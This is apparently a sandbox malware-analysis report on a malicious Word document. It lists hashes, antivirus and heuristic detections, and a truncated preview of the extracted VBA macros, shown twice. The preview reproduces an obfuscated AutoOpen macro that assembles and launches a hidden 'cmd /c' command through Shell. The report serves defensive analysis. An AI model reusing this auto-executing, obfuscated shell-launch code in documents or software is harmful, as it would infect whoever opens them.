Office (OLE) malware analysis — malicious · 057fcc05bfcbb356

MALICIOUS

Office (OLE)

174.5 KB Created: 2018-07-27 15:21:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: c2a51280f3d4cb11cd1b97c3bb74018a SHA-1: 8b2acbc4038504f37b50b7787de489c4b2b3486d SHA-256: 057fcc05bfcbb356e8d4b5f23a6e1379079d77126d16400b8e2b3d2b5fc7175b

142 Risk Score

Heuristics 5

ClamAV: Doc.Malware.Valyria-6774284-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6774284-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33323 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33323 bytes
SHA-256: `edc382e5e15ac09ea9faeea62ef12c9b991dd4d4019c71b337425918146dbca9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZnRndqwqqYSRnq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next tZHus = Sqr(YBivcF) XNrloL = CDbl(2) WzCzw = 398247479 wlhaNK = mBsVlE Shell@ CVar("cm") + zLRMaWvC + UwjttYkzn + bCnAOZ + jpDbKI + rcXzSzGEb + ozJKktbIuz + sRAqj + IlSui + WCSFVwDrwaN + dDPuVQrEcEc + wtNvlz + ccqWkwrv + wRSzS + uNOMl + uRIUbqw + dUSvZoltsVV + bMipouTfVd + MiqFH + bEPzBt + uKOPT + MFvqF + MYfvlY + EUhkKcTduFV + foBIYD + fzDVv + FuBURPEoa + rDUFMSiUAsB + zFziwObz + ZilwaEYdAur + zhWFpEuQ + nwoTEi + hncUzmrJ + EnJtuiIHz + XjsAlsZM + UwshJ + vwfPk + biZrABTo + BSkHT + KNEdzLYBp + afuWscl + twUEPCP + YWJiVV + hjPzdFw + bSFIZH + YDsHlXrHfQS + klNLPQaXzKb, 628529634 - 628529634 FSUGM = Fix(uzjSaO) ClvqW = ChrW(THJXV - uPJkp + lrzmN - ljGFGZ) UAQnJ = Fix(8) End Sub Attribute VB_Name = "KUQXGFnNOBkiE" Function bCnAOZ() On Error Resume Next ipiHU = CStr(joprcN) iobYRf = "d " + " " + "/c" + " " + " " aLXnHY = Int(79170 + fkCaLv - 30016 * fHdjwp) YrGGfflW = " " + " " + " CM%tMp:~" + "-" + "15,1%" + " /V:o" iuVwjjhhS = "N /R " + CStr(Chr(VLImAPJU + wQUBKvatSzPDi + 34 + nunEGqSMKcGE + DLuvVNnzP)) + " SE" + "T " + " " + "'?=" UbCvp = "-__///" + "\_" + "/\-\_\- \/" + "-/_-\_-/" + "\__\- " + "-/\_\-//_" + "\\/_-" bCnAOZ = iobYRf + YrGGfflW + iuVwjjhhS + UbCvp ctMzWR = Sqr(162) LzqBH = Oct(kFLowB) End Function Function jpDbKI() On Error Resume Next UdCajd = "_ \\" + "_" + "\-" LjRvYz = Sin(YuRVAH) aMzFjT = Atn(2) fphwFGh = "/-__\/-_-" + "/ \_-\-_/" + "__-/-\/\ " + "-__" fdkvKzIfHk = "\" + "\--\/\" + "/__/- \-_" + "_/_\" PnGQp = Sqr(kBmcC + SGiEuk / bzlXlI * qYjjwu) hAmlq = Sqr(3) oZMoqZ = "/\" + "\" RcKWw = "/--/_ _-" + "-" + "\_\_//-/\-" + "\/ -/-" dklkQfk = "\\/_/\__-" + "\-" + "_ ///_\-\-" + "__\" + "/\-- -" + "/-_/\_" jpDbKI = UdCajd + fphwFGh + fdkvKzIfHk + oZMoqZ + RcKWw + dklkQfk HSimN = CDbl(63) End Function Function rcXzSzGEb() On Error Resume Next qzKudLH = "/\_-" + "/_\- " + "\__-/" + "_-\\\--" QjnHcpdYtbG = "/_/ \_/_-" + "/\_/---/" + "_\" + " _\/" + "-\_\-/-/" ujSWF = "_/\_ __/" + "-_\/\" + "-/\/--\ _" + "-\\__\-/-/" + "//_" + "- /\/-" + "__/-" YEiKzC = CInt(rBPCXd) GCmlapm = "--" + "/\\_\ _/" + "--/\" + "__/-_/\\-" + "}/_\_--/" + "/" + "_" FGEWl = 218523583 GTLRF = Sin(7) DdHQfsdPwVf = "\" + "-/\-\}" + "_-\//-" rVmov = Round(59847 / oYqwbj) QjCwh = Hex(9124) wdswYE = 9038 CHztskittza = "-\" + "-/\/_" + "\_{_\//\--" ncicq = 70 jDCln = 9759562 OnlZwIuSvd = "_//\" + "-\-_h_//-" + "\-\" + "/\-___\-c" + "\\-//" SITMIT = Rnd(nPAYwm) daRjfn = CInt(69294 + SRkYF - FTvpbI + cuAwYL) DCMCW = 39 qwknprtiTps = "//\_-___\" JkJpuXl = "-t\/" + "/\-_" + "\-" + "--/\_" EIsAj = 271850306 FRCzjLWpT = "_/a/" rcXzSzGEb = qzKudLH + QjnHcpdYtbG + ujSWF + GCmlapm + DdHQfsdPwVf + CHztskittza + OnlZwIuSvd + qwknprtiTps + JkJpuXl + FRCzjLWpT CMFtaz = CStr(MIcjlH) blTAJ = Oct(MzRHj) End Function Function ozJKktbIuz() On Error Resume Next SSWjt = Fix(LTjKmq) kimoJBHolA = "\--_" + "-_/\_-" + "/\_/c-_" + "-__-" + "\///\-_" + "\/}-_-\\\_" + "_" iALBw = HFTpuT vwITDHAiMa = "_//\/-/" + ";-/\\\\_//" + "_-_/-_" + "k" + "/_" BBIjw = Hex(JAvGAm) wdGMq = "-\-__--\/" + "/\/_a\\" + "/___--\/-" + "/\-" + "_e_\\" + "--_\" + "-" NHdLND = 141952124 dCjVIk = 51172770 DzYMB = 22 NBZhfR = "//-" + "_\//r\" JcNFfJ = "/-_//\__" + "-/-_\" + "\b/\" + "_--_\-/_\-" + "/_/" idEoBD = ChrB(bFJzdw + oHZVO) bkhTLc = CInt(YvEBi) aZAPuv = Tan(zpImw) qFKYImjIEi = ";\//-_/-/\" + "\--\_" + "_S\-_" + "\_/" + "__-/\/\/-D" + "-___\-/\/_" Dwjiwz = Fix(38475 - SQzwJh / QiILGs / VqbZD) ZMaizi = "-\\-" + "/" + "f/\-_" + "/\\" + "-_/_\" vtAwDd = ChrB(komHtO) PiAQXrvRTU = "_--$/__" + "-/_\\" + "/-/-_\" + "- \--_" + "\\///" + "_-\-_" KmXVDz = Sgn(dEczT) EqNnTa = CDate(vzjaqD) ... (truncated)

SHA-256: edc382e5e15ac09ea9faeea62ef12c9b991dd4d4019c71b337425918146dbca9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZnRndqwqqYSRnq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   tZHus = Sqr(YBivcF)
   XNrloL = CDbl(2)
   WzCzw = 398247479
   wlhaNK = mBsVlE
Shell@ CVar("cm") + zLRMaWvC + UwjttYkzn + bCnAOZ + jpDbKI + rcXzSzGEb + ozJKktbIuz + sRAqj + IlSui + WCSFVwDrwaN + dDPuVQrEcEc + wtNvlz + ccqWkwrv + wRSzS + uNOMl + uRIUbqw + dUSvZoltsVV + bMipouTfVd + MiqFH + bEPzBt + uKOPT + MFvqF + MYfvlY + EUhkKcTduFV + foBIYD + fzDVv + FuBURPEoa + rDUFMSiUAsB + zFziwObz + ZilwaEYdAur + zhWFpEuQ + nwoTEi + hncUzmrJ + EnJtuiIHz + XjsAlsZM + UwshJ + vwfPk + biZrABTo + BSkHT + KNEdzLYBp + afuWscl + twUEPCP + YWJiVV + hjPzdFw + bSFIZH + YDsHlXrHfQS + klNLPQaXzKb, 628529634 - 628529634
   FSUGM = Fix(uzjSaO)
   ClvqW = ChrW(THJXV - uPJkp + lrzmN - ljGFGZ)
   UAQnJ = Fix(8)
End Sub


Attribute VB_Name = "KUQXGFnNOBkiE"
Function bCnAOZ()
On Error Resume Next
ipiHU = CStr(joprcN)
iobYRf = "d      " + "         " + "/c" + " " + "     "
aLXnHY = Int(79170 + fkCaLv - 30016 * fHdjwp)
YrGGfflW = "     " + "  " + "  CM%tMp:~" + "-" + "15,1%" + " /V:o"
iuVwjjhhS = "N /R   " + CStr(Chr(VLImAPJU + wQUBKvatSzPDi + 34 + nunEGqSMKcGE + DLuvVNnzP)) + "  SE" + "T " + "  " + "'?="
UbCvp = "-__///" + "\_" + "/\-\_\- \/" + "-/_-\_-/" + "\__\- " + "-/\_\-//_" + "\\/_-"
bCnAOZ = iobYRf + YrGGfflW + iuVwjjhhS + UbCvp
   ctMzWR = Sqr(162)
   LzqBH = Oct(kFLowB)
End Function
Function jpDbKI()
On Error Resume Next
UdCajd = "_ \\" + "_" + "\-"
LjRvYz = Sin(YuRVAH)
   aMzFjT = Atn(2)
fphwFGh = "/-__\/-_-" + "/ \_-\-_/" + "__-/-\/\ " + "-__"
fdkvKzIfHk = "\" + "\--\/\" + "/__/- \-_" + "_/_\"
PnGQp = Sqr(kBmcC + SGiEuk / bzlXlI * qYjjwu)
   hAmlq = Sqr(3)
oZMoqZ = "/\" + "\"
RcKWw = "/--/_ _-" + "-" + "\_\_//-/\-" + "\/ -/-"
dklkQfk = "\\/_/\__-" + "\-" + "_ ///_\-\-" + "__\" + "/\-- -" + "/-_/\_"
jpDbKI = UdCajd + fphwFGh + fdkvKzIfHk + oZMoqZ + RcKWw + dklkQfk
   HSimN = CDbl(63)
End Function
Function rcXzSzGEb()
On Error Resume Next
qzKudLH = "/\_-" + "/_\- " + "\__-/" + "_-\\\--"
QjnHcpdYtbG = "/_/ \_/_-" + "/\_/---/" + "_\" + " _\/" + "-\_\-/-/"
ujSWF = "_/\_ __/" + "-_\/\" + "-/\/--\ _" + "-\\__\-/-/" + "//_" + "- /\/-" + "__/-"
YEiKzC = CInt(rBPCXd)
GCmlapm = "--" + "/\\_\ _/" + "--/\" + "__/-_/\\-" + "}/_\_--/" + "/" + "_"
FGEWl = 218523583
   GTLRF = Sin(7)
DdHQfsdPwVf = "\" + "-/\-\}" + "_-\//-"
rVmov = Round(59847 / oYqwbj)
   QjCwh = Hex(9124)
   wdswYE = 9038
CHztskittza = "-\" + "-/\/_" + "\_{_\//\--"
ncicq = 70
   jDCln = 9759562
OnlZwIuSvd = "_//\" + "-\-_h_//-" + "\-\" + "/\-___\-c" + "\\-//"
SITMIT = Rnd(nPAYwm)
   daRjfn = CInt(69294 + SRkYF - FTvpbI + cuAwYL)
   DCMCW = 39
qwknprtiTps = "//\_-___\"
JkJpuXl = "-t\/" + "/\-_" + "\-" + "--/\_"
EIsAj = 271850306
FRCzjLWpT = "_/a/"
rcXzSzGEb = qzKudLH + QjnHcpdYtbG + ujSWF + GCmlapm + DdHQfsdPwVf + CHztskittza + OnlZwIuSvd + qwknprtiTps + JkJpuXl + FRCzjLWpT
   CMFtaz = CStr(MIcjlH)
   blTAJ = Oct(MzRHj)
End Function
Function ozJKktbIuz()
On Error Resume Next
SSWjt = Fix(LTjKmq)
kimoJBHolA = "\--_" + "-_/\_-" + "/\_/c-_" + "-__-" + "\///\-_" + "\/}-_-\\\_" + "_"
iALBw = HFTpuT
vwITDHAiMa = "_//\/-/" + ";-/\\\\_//" + "_-_/-_" + "k" + "/_"
BBIjw = Hex(JAvGAm)
wdGMq = "-\-__--\/" + "/\/_a\\" + "/___--\/-" + "/\-" + "_e_\\" + "--_\" + "-"
NHdLND = 141952124
   dCjVIk = 51172770
   DzYMB = 22
NBZhfR = "//-" + "_\//r\"
JcNFfJ = "/-_//\__" + "-/-_\" + "\b/\" + "_--_\-/_\-" + "/_/"
idEoBD = ChrB(bFJzdw + oHZVO)
   bkhTLc = CInt(YvEBi)
   aZAPuv = Tan(zpImw)
qFKYImjIEi = ";\//-_/-/\" + "\--\_" + "_S\-_" + "\_/" + "__-/\/\/-D" + "-___\-/\/_"
Dwjiwz = Fix(38475 - SQzwJh / QiILGs / VqbZD)
ZMaizi = "-\\-" + "/" + "f/\-_" + "/\\" + "-_/_\"
vtAwDd = ChrB(komHtO)
PiAQXrvRTU = "_--$/__" + "-/_\\" + "/-/-_\" + "- \--_" + "\\///" + "_-\-_"
KmXVDz = Sgn(dEczT)
   EqNnTa = CDate(vzjaqD)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.